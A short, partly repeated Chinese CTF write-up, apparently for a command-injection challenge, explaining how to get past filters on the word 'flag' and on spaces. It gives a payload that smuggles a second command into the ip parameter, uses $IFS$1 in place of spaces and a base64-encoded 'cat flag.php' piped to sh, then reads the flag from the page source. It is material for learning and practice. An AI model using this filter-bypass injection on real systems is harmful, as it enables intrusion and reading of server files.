通过尝试发现flag与空格被过滤
可以用1来代替空格
1.内联执行
内联,就是将反引号内命令的输出作为输入执行
右键查看源代码即可得到flag
2.
payload:
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
内联,就是将反引号内命令的输出作为输入执行
右键查看源代码即可得到flag
payload:
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh